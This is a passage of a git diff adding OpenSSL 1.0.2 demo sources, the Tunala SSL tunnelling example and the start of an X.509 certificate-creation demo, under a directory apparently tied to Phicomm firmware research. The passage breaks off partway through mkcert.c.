+    for (loop = 0; loop < world.tunnels_used; loop++)
+        selector_add_tunala(&world.selector, world.tunnels + loop);
+    /* Now do the select */
+    switch (selector_select(&world.selector)) {
+    case -1:
+        if (errno != EINTR) {
+            fprintf(stderr, "selector_select returned a " "badness error.\n");
+            goto shouldnt_happen;
+        }
+        fprintf(stderr, "Warn, selector interrupted by a signal\n");
+        goto main_loop;
+    case 0:
+        fprintf(stderr, "Warn, selector_select returned 0 - signal?" "?\n");
+        goto main_loop;
+    default:
+        break;
+    }
+    /* Accept new connection if we should and can */
+    if ((world.tunnels_used < max_tunnels)
+        && (selector_get_listener(&world.selector, world.listen_fd, &newfd) ==
+            1)) {
+        /* We have a new connection */
+        if (!tunala_world_new_item(&world, newfd, proxy_ip,
+                                   proxy_port, flipped))
+            fprintf(stderr, "tunala_world_new_item failed\n");
+        else if (out_conns)
+            fprintf(stderr, "Info, new tunnel opened, now up to "
+                    "%d\n", world.tunnels_used);
+    }
+    /*
+     * Give each tunnel its moment, note the while loop is because it makes
+     * the logic easier than with "for" to deal with an array that may shift
+     * because of deletes.
+     */
+    loop = 0;
+    t_item = world.tunnels;
+    while (loop < world.tunnels_used) {
+        if (!tunala_item_io(&world.selector, t_item)) {
+            /*
+             * We're closing whether for reasons of an error or a natural
+             * close. Don't increment loop or t_item because the next item is
+             * moving to us!
+             */
+            if (!out_totals)
+                goto skip_totals;
+            fprintf(stderr, "Tunnel closing, traffic stats follow\n");
+            /* Display the encrypted (over the network) stats */
+            fprintf(stderr, io_stats_dirty,
+                    buffer_total_in(state_machine_get_buffer
+                                    (&t_item->sm, SM_DIRTY_IN)),
+                    buffer_total_out(state_machine_get_buffer
+                                     (&t_item->sm, SM_DIRTY_OUT)));
+            /*
+             * Display the local (tunnelled) stats. NB: Data we *receive* is
+             * data sent *out* of the state_machine on its 'clean' side.
+             * Hence the apparent back-to-front OUT/IN mixup here :-)
+             */
+            fprintf(stderr, io_stats_clean,
+                    buffer_total_out(state_machine_get_buffer
+                                     (&t_item->sm, SM_CLEAN_OUT)),
+                    buffer_total_in(state_machine_get_buffer
+                                    (&t_item->sm, SM_CLEAN_IN)));
+ skip_totals:
+            tunala_world_del_item(&world, loop);
+            if (out_conns)
+                fprintf(stderr, "Info, tunnel closed, down to %d\n",
+                        world.tunnels_used);
+        } else {
+            /* Move to the next item */
+            loop++;
+            t_item++;
+        }
+    }
+    goto main_loop;
+    /* Should never get here */
+ shouldnt_happen:
+    abort();
+    return 1;
+}
+
+/****************/
+/* OpenSSL bits */
+/****************/
+
+static int ctx_set_cert(SSL_CTX *ctx, const char *cert, const char *key)
+{
+    FILE *fp = NULL;
+    X509 *x509 = NULL;
+    EVP_PKEY *pkey = NULL;
+    int toret = 0;              /* Assume an error */
+
+    /* cert */
+    if (cert) {
+        if ((fp = fopen(cert, "r")) == NULL) {
+            fprintf(stderr, "Error opening cert file '%s'\n", cert);
+            goto err;
+        }
+        if (!PEM_read_X509(fp, &x509, NULL, NULL)) {
+            fprintf(stderr, "Error reading PEM cert from '%s'\n", cert);
+            goto err;
+        }
+        if (!SSL_CTX_use_certificate(ctx, x509)) {
+            fprintf(stderr, "Error, cert in '%s' can not be used\n", cert);
+            goto err;
+        }
+        /* Clear the FILE* for reuse in the "key" code */
+        fclose(fp);
+        fp = NULL;
+        fprintf(stderr, "Info, operating with cert in '%s'\n", cert);
+        /*
+         * If a cert was given without matching key, we assume the same file
+         * contains the required key.
+         */
+        if (!key)
+            key = cert;
+    } else {
+        if (key)
+            fprintf(stderr, "Error, can't specify a key without a "
+                    "corresponding certificate\n");
+        else
+            fprintf(stderr, "Error, ctx_set_cert called with " "NULLs!\n");
+        goto err;
+    }
+    /* key */
+    if (key) {
+        if ((fp = fopen(key, "r")) == NULL) {
+            fprintf(stderr, "Error opening key file '%s'\n", key);
+            goto err;
+        }
+        if (!PEM_read_PrivateKey(fp, &pkey, NULL, NULL)) {
+            fprintf(stderr, "Error reading PEM key from '%s'\n", key);
+            goto err;
+        }
+        if (!SSL_CTX_use_PrivateKey(ctx, pkey)) {
+            fprintf(stderr, "Error, key in '%s' can not be used\n", key);
+            goto err;
+        }
+        fprintf(stderr, "Info, operating with key in '%s'\n", key);
+    } else
+        fprintf(stderr, "Info, operating without a cert or key\n");
+    /* Success */
+    toret = 1;
+ err:
+    if (x509)
+        X509_free(x509);
+    if (pkey)
+        EVP_PKEY_free(pkey);
+    if (fp)
+        fclose(fp);
+    return toret;
+}
+
+static int ctx_set_dh(SSL_CTX *ctx, const char *dh_file,
+                      const char *dh_special)
+{
+    DH *dh = NULL;
+    FILE *fp = NULL;
+
+    if (dh_special) {
+        if (strcmp(dh_special, "NULL") == 0)
+            return 1;
+        if (strcmp(dh_special, "standard") == 0) {
+            if ((dh = get_dh512()) == NULL) {
+                fprintf(stderr, "Error, can't parse 'standard'"
+                        " DH parameters\n");
+                return 0;
+            }
+            fprintf(stderr, "Info, using 'standard' DH parameters\n");
+            goto do_it;
+        }
+        if (strcmp(dh_special, "generate") != 0)
+            /*
+             * This shouldn't happen - screening values is handled in main().
+             */
+            abort();
+        fprintf(stderr, "Info, generating DH parameters ... ");
+        fflush(stderr);
+        if (!(dh = DH_new()) || !DH_generate_parameters_ex(dh, 512,
+                                                           DH_GENERATOR_5,
+                                                           NULL)) {
+            fprintf(stderr, "error!\n");
+            if (dh)
+                DH_free(dh);
+            return 0;
+        }
+        fprintf(stderr, "complete\n");
+        goto do_it;
+    }
+    /* So, we're loading dh_file */
+    if ((fp = fopen(dh_file, "r")) == NULL) {
+        fprintf(stderr, "Error, couldn't open '%s' for DH parameters\n",
+                dh_file);
+        return 0;
+    }
+    dh = PEM_read_DHparams(fp, NULL, NULL, NULL);
+    fclose(fp);
+    if (dh == NULL) {
+        fprintf(stderr, "Error, could not parse DH parameters from '%s'\n",
+                dh_file);
+        return 0;
+    }
+    fprintf(stderr, "Info, using DH parameters from file '%s'\n", dh_file);
+ do_it:
+    SSL_CTX_set_tmp_dh(ctx, dh);
+    DH_free(dh);
+    return 1;
+}
+
+static SSL_CTX *initialise_ssl_ctx(int server_mode, const char *engine_id,
+                                   const char *CAfile, const char *cert,
+                                   const char *key, const char *dcert,
+                                   const char *dkey, const char *cipher_list,
+                                   const char *dh_file,
+                                   const char *dh_special, int tmp_rsa,
+                                   int ctx_options, int out_state,
+                                   int out_verify, int verify_mode,
+                                   unsigned int verify_depth)
+{
+    SSL_CTX *ctx = NULL, *ret = NULL;
+    const SSL_METHOD *meth;
+    ENGINE *e = NULL;
+
+    OpenSSL_add_ssl_algorithms();
+    SSL_load_error_strings();
+
+    meth = (server_mode ? SSLv23_server_method() : SSLv23_client_method());
+    if (meth == NULL)
+        goto err;
+    if (engine_id) {
+        ENGINE_load_builtin_engines();
+        if ((e = ENGINE_by_id(engine_id)) == NULL) {
+            fprintf(stderr, "Error obtaining '%s' engine, openssl "
+                    "errors follow\n", engine_id);
+            goto err;
+        }
+        if (!ENGINE_set_default(e, ENGINE_METHOD_ALL)) {
+            fprintf(stderr, "Error assigning '%s' engine, openssl "
+                    "errors follow\n", engine_id);
+            goto err;
+        }
+        ENGINE_free(e);
+    }
+    if ((ctx = SSL_CTX_new(meth)) == NULL)
+        goto err;
+    /* cacert */
+    if (CAfile) {
+        if (!X509_STORE_load_locations(SSL_CTX_get_cert_store(ctx),
+                                       CAfile, NULL)) {
+            fprintf(stderr, "Error loading CA cert(s) in '%s'\n", CAfile);
+            goto err;
+        }
+        fprintf(stderr, "Info, operating with CA cert(s) in '%s'\n", CAfile);
+    } else
+        fprintf(stderr, "Info, operating without a CA cert(-list)\n");
+    if (!SSL_CTX_set_default_verify_paths(ctx)) {
+        fprintf(stderr, "Error setting default verify paths\n");
+        goto err;
+    }
+
+    /* cert and key */
+    if ((cert || key) && !ctx_set_cert(ctx, cert, key))
+        goto err;
+    /* dcert and dkey */
+    if ((dcert || dkey) && !ctx_set_cert(ctx, dcert, dkey))
+        goto err;
+    /* temporary RSA key generation */
+    if (tmp_rsa)
+        SSL_CTX_set_tmp_rsa_callback(ctx, cb_generate_tmp_rsa);
+
+    /* cipher_list */
+    if (cipher_list) {
+        if (!SSL_CTX_set_cipher_list(ctx, cipher_list)) {
+            fprintf(stderr, "Error setting cipher list '%s'\n", cipher_list);
+            goto err;
+        }
+        fprintf(stderr, "Info, set cipher list '%s'\n", cipher_list);
+    } else
+        fprintf(stderr, "Info, operating with default cipher list\n");
+
+    /* dh_file & dh_special */
+    if ((dh_file || dh_special) && !ctx_set_dh(ctx, dh_file, dh_special))
+        goto err;
+
+    /* ctx_options */
+    SSL_CTX_set_options(ctx, ctx_options);
+
+    /* out_state (output of SSL handshake states to screen). */
+    if (out_state)
+        cb_ssl_info_set_output(stderr);
+
+    /* out_verify */
+    if (out_verify > 0) {
+        cb_ssl_verify_set_output(stderr);
+        cb_ssl_verify_set_level(out_verify);
+    }
+
+    /* verify_depth */
+    cb_ssl_verify_set_depth(verify_depth);
+
+    /* Success! (includes setting verify_mode) */
+    SSL_CTX_set_info_callback(ctx, cb_ssl_info);
+    SSL_CTX_set_verify(ctx, verify_mode, cb_ssl_verify);
+    ret = ctx;
+ err:
+    if (!ret) {
+        ERR_print_errors_fp(stderr);
+        if (ctx)
+            SSL_CTX_free(ctx);
+    }
+    return ret;
+}
+
+/*****************/
+/* Selector bits */
+/*****************/
+
+static void selector_sets_init(select_sets_t * s)
+{
+    s->max = 0;
+    FD_ZERO(&s->reads);
+    FD_ZERO(&s->sends);
+    FD_ZERO(&s->excepts);
+}
+
+static void selector_init(tunala_selector_t * selector)
+{
+    selector_sets_init(&selector->last_selected);
+    selector_sets_init(&selector->next_select);
+}
+
+#define SEL_EXCEPTS 0x00
+#define SEL_READS   0x01
+#define SEL_SENDS   0x02
+static void selector_add_raw_fd(tunala_selector_t * s, int fd, int flags)
+{
+    FD_SET(fd, &s->next_select.excepts);
+    if (flags & SEL_READS)
+        FD_SET(fd, &s->next_select.reads);
+    if (flags & SEL_SENDS)
+        FD_SET(fd, &s->next_select.sends);
+    /* Adjust "max" */
+    if (s->next_select.max < (fd + 1))
+        s->next_select.max = fd + 1;
+}
+
+static void selector_add_listener(tunala_selector_t * selector, int fd)
+{
+    selector_add_raw_fd(selector, fd, SEL_READS);
+}
+
+static void selector_add_tunala(tunala_selector_t * s, tunala_item_t * t)
+{
+    /* Set clean read if sm.clean_in is not full */
+    if (t->clean_read != -1) {
+        selector_add_raw_fd(s, t->clean_read,
+                            (buffer_full(state_machine_get_buffer(&t->sm,
+                                                                  SM_CLEAN_IN))
+                             ? SEL_EXCEPTS : SEL_READS));
+    }
+    /* Set clean send if sm.clean_out is not empty */
+    if (t->clean_send != -1) {
+        selector_add_raw_fd(s, t->clean_send,
+                            (buffer_empty(state_machine_get_buffer(&t->sm,
+                                                                   SM_CLEAN_OUT))
+                             ? SEL_EXCEPTS : SEL_SENDS));
+    }
+    /* Set dirty read if sm.dirty_in is not full */
+    if (t->dirty_read != -1) {
+        selector_add_raw_fd(s, t->dirty_read,
+                            (buffer_full(state_machine_get_buffer(&t->sm,
+                                                                  SM_DIRTY_IN))
+                             ? SEL_EXCEPTS : SEL_READS));
+    }
+    /* Set dirty send if sm.dirty_out is not empty */
+    if (t->dirty_send != -1) {
+        selector_add_raw_fd(s, t->dirty_send,
+                            (buffer_empty(state_machine_get_buffer(&t->sm,
+                                                                   SM_DIRTY_OUT))
+                             ? SEL_EXCEPTS : SEL_SENDS));
+    }
+}
+
+static int selector_select(tunala_selector_t * selector)
+{
+    memcpy(&selector->last_selected, &selector->next_select,
+           sizeof(select_sets_t));
+    selector_sets_init(&selector->next_select);
+    return select(selector->last_selected.max,
+                  &selector->last_selected.reads,
+                  &selector->last_selected.sends,
+                  &selector->last_selected.excepts, NULL);
+}
+
+/*
+ * This returns -1 for error, 0 for no new connections, or 1 for success, in
+ * which case *newfd is populated.
+ */
+static int selector_get_listener(tunala_selector_t * selector, int fd,
+                                 int *newfd)
+{
+    if (FD_ISSET(fd, &selector->last_selected.excepts))
+        return -1;
+    if (!FD_ISSET(fd, &selector->last_selected.reads))
+        return 0;
+    if ((*newfd = ip_accept_connection(fd)) == -1)
+        return -1;
+    return 1;
+}
+
+/************************/
+/* "Tunala" world stuff */
+/************************/
+
+static int tunala_world_make_room(tunala_world_t * world)
+{
+    unsigned int newsize;
+    tunala_item_t *newarray;
+
+    if (world->tunnels_used < world->tunnels_size)
+        return 1;
+    newsize = (world->tunnels_size == 0 ? 16 :
+               ((world->tunnels_size * 3) / 2));
+    if ((newarray = malloc(newsize * sizeof(tunala_item_t))) == NULL)
+        return 0;
+    memset(newarray, 0, newsize * sizeof(tunala_item_t));
+    if (world->tunnels_used > 0)
+        memcpy(newarray, world->tunnels,
+               world->tunnels_used * sizeof(tunala_item_t));
+    if (world->tunnels_size > 0)
+        free(world->tunnels);
+    /* migrate */
+    world->tunnels = newarray;
+    world->tunnels_size = newsize;
+    return 1;
+}
+
+static int tunala_world_new_item(tunala_world_t * world, int fd,
+                                 const char *ip, unsigned short port,
+                                 int flipped)
+{
+    tunala_item_t *item;
+    int newfd;
+    SSL *new_ssl = NULL;
+
+    if (!tunala_world_make_room(world))
+        return 0;
+    if ((new_ssl = SSL_new(world->ssl_ctx)) == NULL) {
+        fprintf(stderr, "Error creating new SSL\n");
+        ERR_print_errors_fp(stderr);
+        return 0;
+    }
+    item = world->tunnels + (world->tunnels_used++);
+    state_machine_init(&item->sm);
+    item->clean_read = item->clean_send =
+        item->dirty_read = item->dirty_send = -1;
+    if ((newfd = ip_create_connection_split(ip, port)) == -1)
+        goto err;
+    /*
+     * Which way round? If we're a server, "fd" is the dirty side and the
+     * connection we open is the clean one. For a client, it's the other way
+     * around. Unless, of course, we're "flipped" in which case everything
+     * gets reversed. :-)
+     */
+    if ((world->server_mode && !flipped) || (!world->server_mode && flipped)) {
+        item->dirty_read = item->dirty_send = fd;
+        item->clean_read = item->clean_send = newfd;
+    } else {
+        item->clean_read = item->clean_send = fd;
+        item->dirty_read = item->dirty_send = newfd;
+    }
+    /*
+     * We use the SSL's "app_data" to indicate a call-back induced "kill"
+     */
+    SSL_set_app_data(new_ssl, NULL);
+    if (!state_machine_set_SSL(&item->sm, new_ssl, world->server_mode))
+        goto err;
+    return 1;
+ err:
+    tunala_world_del_item(world, world->tunnels_used - 1);
+    return 0;
+
+}
+
+static void tunala_world_del_item(tunala_world_t * world, unsigned int idx)
+{
+    tunala_item_t *item = world->tunnels + idx;
+    if (item->clean_read != -1)
+        close(item->clean_read);
+    if (item->clean_send != item->clean_read)
+        close(item->clean_send);
+    item->clean_read = item->clean_send = -1;
+    if (item->dirty_read != -1)
+        close(item->dirty_read);
+    if (item->dirty_send != item->dirty_read)
+        close(item->dirty_send);
+    item->dirty_read = item->dirty_send = -1;
+    state_machine_close(&item->sm);
+    /* OK, now we fix the item array */
+    if (idx + 1 < world->tunnels_used)
+        /* We need to scroll entries to the left */
+        memmove(world->tunnels + idx,
+                world->tunnels + (idx + 1),
+                (world->tunnels_used - (idx + 1)) * sizeof(tunala_item_t));
+    world->tunnels_used--;
+}
+
+static int tunala_item_io(tunala_selector_t * selector, tunala_item_t * item)
+{
+    int c_r, c_s, d_r, d_s;     /* Four boolean flags */
+
+    /* Take ourselves out of the gene-pool if there was an except */
+    if ((item->clean_read != -1) && FD_ISSET(item->clean_read,
+                                             &selector->
+                                             last_selected.excepts))
+        return 0;
+    if ((item->clean_send != -1) && FD_ISSET(item->clean_send,
+                                             &selector->
+                                             last_selected.excepts))
+        return 0;
+    if ((item->dirty_read != -1) && FD_ISSET(item->dirty_read,
+                                             &selector->
+                                             last_selected.excepts))
+        return 0;
+    if ((item->dirty_send != -1) && FD_ISSET(item->dirty_send,
+                                             &selector->
+                                             last_selected.excepts))
+        return 0;
+    /* Grab our 4 IO flags */
+    c_r = c_s = d_r = d_s = 0;
+    if (item->clean_read != -1)
+        c_r = FD_ISSET(item->clean_read, &selector->last_selected.reads);
+    if (item->clean_send != -1)
+        c_s = FD_ISSET(item->clean_send, &selector->last_selected.sends);
+    if (item->dirty_read != -1)
+        d_r = FD_ISSET(item->dirty_read, &selector->last_selected.reads);
+    if (item->dirty_send != -1)
+        d_s = FD_ISSET(item->dirty_send, &selector->last_selected.sends);
+    /* If no IO has happened for us, skip needless data looping */
+    if (!c_r && !c_s && !d_r && !d_s)
+        return 1;
+    if (c_r)
+        c_r = (buffer_from_fd(state_machine_get_buffer(&item->sm,
+                                                       SM_CLEAN_IN),
+                              item->clean_read) <= 0);
+    if (c_s)
+        c_s = (buffer_to_fd(state_machine_get_buffer(&item->sm,
+                                                     SM_CLEAN_OUT),
+                            item->clean_send) <= 0);
+    if (d_r)
+        d_r = (buffer_from_fd(state_machine_get_buffer(&item->sm,
+                                                       SM_DIRTY_IN),
+                              item->dirty_read) <= 0);
+    if (d_s)
+        d_s = (buffer_to_fd(state_machine_get_buffer(&item->sm,
+                                                     SM_DIRTY_OUT),
+                            item->dirty_send) <= 0);
+    /* If any of the flags is non-zero, that means they need closing */
+    if (c_r) {
+        close(item->clean_read);
+        if (item->clean_send == item->clean_read)
+            item->clean_send = -1;
+        item->clean_read = -1;
+    }
+    if (c_s && (item->clean_send != -1)) {
+        close(item->clean_send);
+        if (item->clean_send == item->clean_read)
+            item->clean_read = -1;
+        item->clean_send = -1;
+    }
+    if (d_r) {
+        close(item->dirty_read);
+        if (item->dirty_send == item->dirty_read)
+            item->dirty_send = -1;
+        item->dirty_read = -1;
+    }
+    if (d_s && (item->dirty_send != -1)) {
+        close(item->dirty_send);
+        if (item->dirty_send == item->dirty_read)
+            item->dirty_read = -1;
+        item->dirty_send = -1;
+    }
+    /*
+     * This function name is attributed to the term donated by David Schwartz
+     * on openssl-dev, message-ID:
+     * <NCBBLIEPOCbmasEKBEAKEEDGLIAA.davids@webmaster.com>. :-)
+     */
+    if (!state_machine_churn(&item->sm))
+        /*
+         * If the SSL closes, it will also zero-out the _in buffers and will
+         * in future process just outgoing data. As and when the outgoing
+         * data has gone, it will return zero here to tell us to bail out.
+         */
+        return 0;
+    /* Otherwise, we return zero if both sides are dead. */
+    if (((item->clean_read == -1) || (item->clean_send == -1)) &&
+        ((item->dirty_read == -1) || (item->dirty_send == -1)))
+        return 0;
+    /*
+     * If only one side closed, notify the SSL of this so it can take
+     * appropriate action.
+     */
+    if ((item->clean_read == -1) || (item->clean_send == -1)) {
+        if (!state_machine_close_clean(&item->sm))
+            return 0;
+    }
+    if ((item->dirty_read == -1) || (item->dirty_send == -1)) {
+        if (!state_machine_close_dirty(&item->sm))
+            return 0;
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/tunala.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/tunala.h
new file mode 100644
index 0000000..28860d7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/tunala.h
@@ -0,0 +1,244 @@
+/*
+ * Tunala ("Tunneler with a New Zealand accent") Written by Geoff Thorpe,
+ * but endorsed/supported by noone. Please use this is if it's useful or
+ * informative to you, but it's only here as a scratchpad for ideas about how
+ * you might (or might not) program with OpenSSL. If you deploy this is in a
+ * mission-critical environment, and have not read, understood, audited, and
+ * modified this code to your satisfaction, and the result is that all hell
+ * breaks loose and you are looking for a new employer, then it proves
+ * nothing except perhaps that Darwinism is alive and well. Let's just say,
+ * *I* don't use this in a mission-critical environment, so it would be
+ * stupid for anyone to assume that it is solid and/or tested enough when
+ * even its author doesn't place that much trust in it. You have been warned.
+ * With thanks to Cryptographic Appliances, Inc.
+ */
+
+#ifndef _TUNALA_H
+# define _TUNALA_H
+
+/* pull in autoconf fluff */
+# ifndef NO_CONFIG_H
+#  include "config.h"
+# else
+/*
+ * We don't have autoconf, we have to set all of these unless a tweaked
+ * Makefile tells us not to ...
+ */
+/* headers */
+#  ifndef NO_HAVE_SELECT
+#   define HAVE_SELECT
+#  endif
+#  ifndef NO_HAVE_SOCKET
+#   define HAVE_SOCKET
+#  endif
+#  ifndef NO_HAVE_UNISTD_H
+#   define HAVE_UNISTD_H
+#  endif
+#  ifndef NO_HAVE_FCNTL_H
+#   define HAVE_FCNTL_H
+#  endif
+#  ifndef NO_HAVE_LIMITS_H
+#   define HAVE_LIMITS_H
+#  endif
+/* features */
+#  ifndef NO_HAVE_STRSTR
+#   define HAVE_STRSTR
+#  endif
+#  ifndef NO_HAVE_STRTOUL
+#   define HAVE_STRTOUL
+#  endif
+# endif
+
+# if !defined(HAVE_SELECT) || !defined(HAVE_SOCKET)
+#  error "can't build without some network basics like select() and socket()"
+# endif
+
+# include <stdlib.h>
+# ifndef NO_SYSTEM_H
+#  include <string.h>
+#  ifdef HAVE_UNISTD_H
+#   include <unistd.h>
+#  endif
+#  ifdef HAVE_FCNTL_H
+#   include <fcntl.h>
+#  endif
+#  ifdef HAVE_LIMITS_H
+#   include <limits.h>
+#  endif
+#  include <netdb.h>
+#  include <signal.h>
+#  include <sys/socket.h>
+#  include <sys/types.h>
+#  include <netinet/in.h>
+# endif                         /* !defined(NO_SYSTEM_H) */
+
+# ifndef NO_OPENSSL
+#  include <openssl/err.h>
+#  include <openssl/engine.h>
+#  include <openssl/ssl.h>
+# endif                         /* !defined(NO_OPENSSL) */
+
+# ifndef OPENSSL_NO_BUFFER
+/*
+ * This is the generic "buffer" type that is used when feeding the
+ * state-machine. It's basically a FIFO with respect to the "adddata" &
+ * "takedata" type functions that operate on it.
+ */
+#  define MAX_DATA_SIZE 16384
+typedef struct _buffer_t {
+    unsigned char data[MAX_DATA_SIZE];
+    unsigned int used;
+    /*
+     * Statistical values - counts the total number of bytes read in and read
+     * out (respectively) since "buffer_init()"
+     */
+    unsigned long total_in, total_out;
+} buffer_t;
+
+/* Initialise a buffer structure before use */
+void buffer_init(buffer_t * buf);
+/*
+ * Cleanup a buffer structure - presently not needed, but if buffer_t is
+ * converted to using dynamic allocation, this would be required - so should
+ * be called to protect against an explosion of memory leaks later if the
+ * change is made.
+ */
+void buffer_close(buffer_t * buf);
+
+/* Basic functions to manipulate buffers */
+
+unsigned int buffer_used(buffer_t * buf); /* How much data in the buffer */
+unsigned int buffer_unused(buffer_t * buf); /* How much space in the buffer */
+int buffer_full(buffer_t * buf); /* Boolean, is it full? */
+int buffer_notfull(buffer_t * buf); /* Boolean, is it not full? */
+int buffer_empty(buffer_t * buf); /* Boolean, is it empty? */
+int buffer_notempty(buffer_t * buf); /* Boolean, is it not empty? */
+unsigned long buffer_total_in(buffer_t * buf); /* Total bytes written to
+                                                * buffer */
+unsigned long buffer_total_out(buffer_t * buf); /* Total bytes read from
+                                                 * buffer */
+
+#  if 0                         /* Currently used only within buffer.c -
+                                 * better to expose only higher-level
+                                 * functions anyway */
+/*
+ * Add data to the tail of the buffer, returns the amount that was actually
+ * added (so, you need to check if return value is less than size)
+ */
+unsigned int buffer_adddata(buffer_t * buf, const unsigned char *ptr,
+                            unsigned int size);
+
+/*
+ * Take data from the front of the buffer (and scroll the rest forward). If
+ * "ptr" is NULL, this just removes data off the front of the buffer. Return
+ * value is the amount actually removed (can be less than size if the buffer
+ * has too little data).
+ */
+unsigned int buffer_takedata(buffer_t * buf, unsigned char *ptr,
+                             unsigned int size);
+
+/*
+ * Flushes as much data as possible out of the "from" buffer into the "to"
+ * buffer. Return value is the amount moved. The amount moved can be
+ * restricted to a maximum by specifying "cap" - setting it to -1 means no
+ * limit.
+ */
+unsigned int buffer_tobuffer(buffer_t * to, buffer_t * from, int cap);
+#  endif
+
+#  ifndef NO_IP
+/* Read or write between a file-descriptor and a buffer */
+int buffer_from_fd(buffer_t * buf, int fd);
+int buffer_to_fd(buffer_t * buf, int fd);
+#  endif                        /* !defined(NO_IP) */
+
+#  ifndef NO_OPENSSL
+/* Read or write between an SSL or BIO and a buffer */
+void buffer_from_SSL(buffer_t * buf, SSL *ssl);
+void buffer_to_SSL(buffer_t * buf, SSL *ssl);
+void buffer_from_BIO(buffer_t * buf, BIO *bio);
+void buffer_to_BIO(buffer_t * buf, BIO *bio);
+
+/* Callbacks */
+void cb_ssl_info(const SSL *s, int where, int ret);
+/* Called if output should be sent too */
+void cb_ssl_info_set_output(FILE *fp);
+int cb_ssl_verify(int ok, X509_STORE_CTX *ctx);
+void cb_ssl_verify_set_output(FILE *fp);
+void cb_ssl_verify_set_depth(unsigned int verify_depth);
+void cb_ssl_verify_set_level(unsigned int level);
+RSA *cb_generate_tmp_rsa(SSL *s, int is_export, int keylength);
+#  endif                        /* !defined(NO_OPENSSL) */
+# endif                         /* !defined(OPENSSL_NO_BUFFER) */
+
+# ifndef NO_TUNALA
+#  ifdef OPENSSL_NO_BUFFER
+#   error "TUNALA section of tunala.h requires BUFFER support"
+#  endif
+typedef struct _state_machine_t {
+    SSL *ssl;
+    BIO *bio_intossl;
+    BIO *bio_fromssl;
+    buffer_t clean_in, clean_out;
+    buffer_t dirty_in, dirty_out;
+} state_machine_t;
+typedef enum {
+    SM_CLEAN_IN, SM_CLEAN_OUT,
+    SM_DIRTY_IN, SM_DIRTY_OUT
+} sm_buffer_t;
+void state_machine_init(state_machine_t * machine);
+void state_machine_close(state_machine_t * machine);
+buffer_t *state_machine_get_buffer(state_machine_t * machine,
+                                   sm_buffer_t type);
+SSL *state_machine_get_SSL(state_machine_t * machine);
+int state_machine_set_SSL(state_machine_t * machine, SSL *ssl, int is_server);
+/* Performs the data-IO loop and returns zero if the machine should close */
+int state_machine_churn(state_machine_t * machine);
+/*
+ * Is used to handle closing conditions - namely when one side of the tunnel
+ * has closed but the other should finish flushing.
+ */
+int state_machine_close_clean(state_machine_t * machine);
+int state_machine_close_dirty(state_machine_t * machine);
+# endif                         /* !defined(NO_TUNALA) */
+
+# ifndef NO_IP
+/*
+ * Initialise anything related to the networking. This includes blocking
+ * pesky SIGPIPE signals.
+ */
+int ip_initialise(void);
+/*
+ * ip is the 4-byte ip address (eg. 127.0.0.1 is {0x7F,0x00,0x00,0x01}), port
+ * is the port to listen on (host byte order), and the return value is the
+ * file-descriptor or -1 on error.
+ */
+int ip_create_listener_split(const char *ip, unsigned short port);
+/* Same semantics as above. */
+int ip_create_connection_split(const char *ip, unsigned short port);
+/* Converts a string into the ip/port before calling the above */
+int ip_create_listener(const char *address);
+int ip_create_connection(const char *address);
+/*
+ * Just does a string conversion on its own. NB: If accept_all_ip is
+ * non-zero, then the address string could be just a port. Ie. it's suitable
+ * for a listening address but not a connecting address.
+ */
+int ip_parse_address(const char *address, const char **parsed_ip,
+                     unsigned short *port, int accept_all_ip);
+/*
+ * Accepts an incoming connection through the listener. Assumes selects and
+ * what-not have deemed it an appropriate thing to do.
+ */
+int ip_accept_connection(int listen_fd);
+# endif                         /* !defined(NO_IP) */
+
+/* These functions wrap up things that can be portability hassles. */
+int int_strtoul(const char *str, unsigned long *val);
+# ifdef HAVE_STRSTR
+#  define int_strstr strstr
+# else
+char *int_strstr(const char *haystack, const char *needle);
+# endif
+
+#endif                          /* !defined(_TUNALA_H) */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/x509/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/x509/README
new file mode 100644
index 0000000..88f9d6c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/x509/README
@@ -0,0 +1,3 @@
+This directory contains examples of how to contruct
+various X509 structures. Certificates, certificate requests
+and CRLs.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/x509/mkcert.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/x509/mkcert.c
new file mode 100644
index 0000000..1e62146
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/x509/mkcert.c
@@ -0,0 +1,169 @@
+/*
+ * Certificate creation. Demonstrates some certificate related operations.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <openssl/pem.h>
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+int mkcert(X509 **x509p, EVP_PKEY **pkeyp, int bits, int serial, int days);
+int add_ext(X509 *cert, int nid, char *value);
+
+int main(int argc, char **argv)
+{
+    BIO *bio_err;
+    X509 *x509 = NULL;
+    EVP_PKEY *pkey = NULL;
+
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+    bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    mkcert(&x509, &pkey, 512, 0, 365);
+
+    RSA_print_fp(stdout, pkey->pkey.rsa, 0);
+    X509_print_fp(stdout, x509);
+
+    PEM_write_PrivateKey(stdout, pkey, NULL, NULL, 0, NULL, NULL);
+    PEM_write_X509(stdout, x509);
+
+    X509_free(x509);
+    EVP_PKEY_free(pkey);
+
+#ifndef OPENSSL_NO_ENGINE
+    ENGINE_cleanup();
+#endif
+    CRYPTO_cleanup_all_ex_data();
+
+    CRYPTO_mem_leaks(bio_err);
+    BIO_free(bio_err);
+    return (0);
+}
+
+static void callback(int p, int n, void *arg)
+{
+    char c = 'B';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    fputc(c, stderr);
+}
+
+int mkcert(X509 **x509p, EVP_PKEY **pkeyp, int bits, int serial, int days)
+{
+    X509 *x;
+    EVP_PKEY *pk;
+    RSA *rsa;
+    X509_NAME *name = NULL;
+
+    if ((pkeyp == NULL) || (*pkeyp == NULL)) {
